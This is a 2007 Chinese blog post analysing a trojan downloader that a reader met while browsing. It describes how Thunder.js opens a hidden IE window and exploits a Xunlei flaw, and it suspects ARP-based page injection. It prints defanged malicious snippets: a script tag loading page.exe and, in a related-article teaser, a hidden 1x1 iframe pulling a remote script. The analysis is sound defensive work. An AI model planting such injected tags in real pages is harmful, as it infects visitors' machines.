网友遇到 Trojan.DL.Win32.Agent.yqv,疑是ARP病毒传播

最新推荐文章于 2022-02-25 19:38:17 发布
最新推荐文章于 2022-02-25 19:38:17 发布
阅读量2.1k 收藏
点赞数
分类专栏: 系统安全 文章标签: 脚本 file email ie c 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/purpleendurer/article/details/1795130
版权

网友遇到 Trojan.DL.Win32.Agent.yqv,疑是ARP病毒传播

endurer 原创
2007-09-21 第1

一位网友发来 email 说他现在使用电脑浏览网页时,隔一段时间瑞星就会提示发现病毒:
/---
病毒名称                        处理结果    发现日期    路径   文件
Trojan.DL.Script.VBS.Agent.xgp  跳过脚本    2007-09-20 20:39  C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp   2072186203104.tmp
Hack.Exploit.Script.JS.Bugexp.a 跳过脚本    2007-09-20 20:39  C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp   2072186203104.tmp
---/


接着系统提示下载文件:Thunder.js,下载后用瑞星扫描报为:Trojan.DL.JS.THunder.b

Scanned file:   Thunder.js - Infected

Thunder.js - infected by Trojan-Downloader.JS.Agent.pg
 

他把这个文件作为附件发过来了。

Thunder.js 的功能为:运行 IE,把窗口移动到屏幕显示范围之外,打开hxxp://news.1**6*3-s*tv.com/page/image/Downer.html,利用讯雷漏洞,运行下载到 IE 缓存中的 abc[1].exe

hxxp://news.1**6*3-s*tv.com/page/image/Downer.html 内容为:
/---
<script src="page.exe"></script>
---/


文件说明符 : D:/test/page.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-9-20 23:17:31
修改时间 : 2007-9-20 23:17:42
访问时间 : 2007-9-20 0:0:0
大小 : 10596 字节 10.356 KB
MD5 : c9ce5001e401cc796785810d9a3a91b2
HSA1: 153C5DA7A325A8C50DEC9921B1816001BCB74C2B

瑞星报为 Trojan.DL.Win32.Agent.yqv

Scanned file:   page.exe - Infected

page.exe - infected by Trojan-Downloader.Win32.Small.fso

把 pe_xscan 传给他 扫描 log 发回来分析,未发现可疑项。

怀疑是与网友电脑处于同一网络的其他电脑中了ARP病毒,该病毒会定期在网页中加入恶意代码。 

紫郢剑侠
关注
专栏目录
ARP病毒自动加入传播Trojan.PSW.Win32.OnlineGames的代码
Purpleendurer@CSDN
07-31 1895
ARP病毒自动加入传播Trojan.PSW.Win32.OnlineGames的代码endurer 原创2007-07-31 第1版前两天,一位网友反映他最近打开网页显示都是乱码。让他把网页源代码传过来分析,发现网页首部被加入代码:/---<iframe src=hxxp://**.9**-*6*.in/n.js width=1 height=1></iframe>---/hxxp
getviewtype()实现recyclerview分组
caobin_study的博客
09-15 5932
直接进入主题,要实现的效果如下图: 使用的是recyclerview的分组,getviewtype()方法返回不同布局。 listview实现就是listview嵌套gridview,把每个分组当成一个listview的一个item,想象就很麻烦,接下来用recycler来实现这个效果。 首先recyclerview的基本用法要会,这里我就不想说recyclerview的基本用法了不太了...
foxmail 发不出邮件,被电脑管家云查杀引擎检测出带有病毒:Win32.Trojan.Agent.hryf ...
zz_xyz的博客
08-19 3700
1,您可以到腾讯电脑管家官网下载一个电脑管家。 2,然后使用电脑管家——杀毒——指定位置查杀——选择到该软件目录,开始扫描,检测一下是否的确存在木马病毒,如果有的话就根据电脑管家提示进行处理即可。...
pythoncqt_python基础篇
热门推荐
weixin_39757040的博客
12-11 1万+
python脚本开头#!/usr/bin/env python# -*- coding: utf-8 -*print "你好,世界"不要问为什么,记住就好了变量定于的规则变量名只能是字母、数字或下划线的任意组合变量名的第一个字符不能是数字以下关键字不能声明为变量名['and', 'as', 'assert', 'break', 'class', 'continue', 'def', 'del', ...
美团点评2017秋招笔试真题A
24K.好菇凉
03-20 582
下面关于Android中定义style和theme的描述错误的是? A.都可以减少重复属性设置 B.style可以作用在Activity上 C.Theme类可以继承 D.一个TextView的style中定义了textColor属性,TextView本身也设置textColor属性,那么TextView本身定义的优先级较高 参考答案:
病毒Trojan.DL.Win32.Agent.zjh原理及解决方案
weixin_34376986的博客
03-27 336
病毒名称:Trojan.DL.Win32.Agent.zjh 病毒样本文件名称:niu.exe 样本文件大小:62976字节 感染过程: 运行病毒样本程序niu.exe,病毒会在所有分区根目录中释放病毒文件niu.exe和autorun.inf,如下图: 文件夹的显示隐藏文件属性被锁定: 在系统目system32录中释放病毒文件r...
Trojan.Win32.Scar.cjdy分析
chasdmeng的专栏
09-29 3457
前记:         这是很早之前分析的一个windows上的病毒程序,程序很有代表性,我当时分析的也很细致。最近在整理文档时发现了它,感觉还是有分享的价值的。 一、病毒标签: 病毒名称:Trojan.Win32.Scar.cjdy 病毒类型:下载类、感染型程序 文件 MD5:2EFC5A7D29B43AD8B0C02047AF7B4ED5 公开范围:完全公开 危害等级:3
Trojan-Downloader.Win32.Generic.a...
06-08
【病毒名称】:Trojan-Downloader.Win32.Generic.a 【病毒类型】:下载者 【危害程度】:中 【传播方式】:网络 【受影响系统】:windows 98以上 病毒行为: 该病毒为下载者木马类,病毒运行后调用API获取系统文件夹...
osx.raedbot.rar_At Risk_OSX.Raedb_linux trojan_realbasic_xraed
09-21
标题中的"osx.raedbot.rar_At Risk_OSX.Raedb_linux trojan_realbasic_xraed"揭示了这个压缩包文件包含的是一种针对多个平台的蠕虫木马病毒,特别是针对Windows 32位系统、Linux以及Mac OS。关键词“Cross-Platform...
2020年trojan最新windows64客户端trojan-1.15.1-win.zip
04-14
2020年trojan最新windows64客户端
Trojan-Downloader.Win32.Agent.bbb 木马手动查杀
最新发布
06-09
首先,关闭所有正在运行的程序,然后按照以下步骤手动查杀Trojan-Downloader.Win32.Agent.bbb木马: 1. 打开任务管理器,结束所有Trojan-Downloader.Win32.Agent.bbb木马相关进程。 2. 删除Trojan-Downloader.Win...
如何杀除Trojan.win32.Thsys病毒
job82824的专栏
03-25 5785
本人这几天深受其害,但是最后还是终于摆脱了这个可恶的病毒的骚扰。 这个病毒像牛皮糖一样,用360/360急救箱/木马克星之类的都不能彻底杀除,因为它的传染能力较强。 其实所有的蠕虫病毒都有个共性,就是善于感染硬盘中的.dll文件和.exe文件,你发觉它的存在越晚,那它感染的文件就会越多。 以前我用这种方法对付过威金蠕虫--就是将硬盘中的所有.dll和.exe文件都搜索出来,
VC++死忠用户的N多愚钝表现之点评
ThinkHY的专栏
07-25 993
在这个页面:http://lixudong.blogbus.com/logs/69902204.html 看过下面这些观点,本科毕业后,我有过二年的Linux平台开发经验和一年半的Windows开发经历,下面是我结合自己的经历做的一些点评。
K8s 很难么?带你从头到尾捋一遍,不信你学不会
民工哥的博客
02-23 9048
点击关注公众号,回复“1024”获取2TB学习资源!为什么要学习 Kubernetes?虽然 Docker 已经很强大了,但是在实际使用上还是有诸多不便,比如集群管理、资源调度、文件管理等...
10天智能锁项目实战第1天(了解单片机STM32F401RET6和C语言基础)
北豼不太皮的博客
02-21 3586
10天智能锁项目实战第1天(了解单片机STM32F401RET6和C语言基础)一、学习目标二、了解单片机STM32F401RET6三、C语言基础 一、学习目标 二、了解单片机STM32F401RET6 4、STM32F401RE特征 三、C语言基础 1.数据类型 常用2的次方: 2^7 = 128 2^8 = 256 2^15 = 32768 2^16= 65536 51单片机常见的数据类型: char: 占内存1字节 取值范围:-128~127 -2^7 ~ 2
Android开发(1) | Fragment 的应用——新闻应用
Jormungand_V的博客
02-21 7094
文章目录 news_item.xml: <TextView xmlns:android="http://schemas.android.com/apk/res/android" android:id="@+id/news_title" android:layout_width="match_parent" android:layout_height="wrap_content" android:lines="1" android:ellipsize="
系统学习 TypeScript(四)——变量声明的初步学习
编程三昧
02-25 1736
认识了 TypeScript 中的基础类型,接下来当然是变量声明的相关学习了,我在这里记录一下我学习过程中的一些总结。
清除浮动的五种方法
weixin_52212950的博客
02-22 2708
为什么要清除浮动?因为往往浮动后的子元素因为脱离了标准流,不能自动撑起父元素的高度,所以会对后续布局产生影响,对此清除浮动不如理解为清除浮动产生的影响更为合理。 例如:我们设置了两个盒子如图所示,粉色为父盒子,只有宽度没有高度,蓝色盒子有宽有高,粉色盒子的高由蓝盒子的高度撑开。 但是给蓝色的子盒子设置了左浮动后,脱离了标准流,无法再撑开粉盒子,可以看到粉盒子高度变成了0; 清除浮动有五种方法: 直接设置父元素的高度 额外标签法 单伪元素法 双伪元素法 ove.
查杀win32/Trojan.e9b变种Autorun病毒的方法
本文主要关注的是win32/Trojan.e9b,一种变种的Autorun病毒,其特性与传统的Autorun病毒略有不同。 win32/Trojan.e9b病毒的独特之处在于它的隐蔽性。与某些其他类型的病毒,如Trojan.Generic.Is.536802不同,win32/...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

紫郢剑侠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值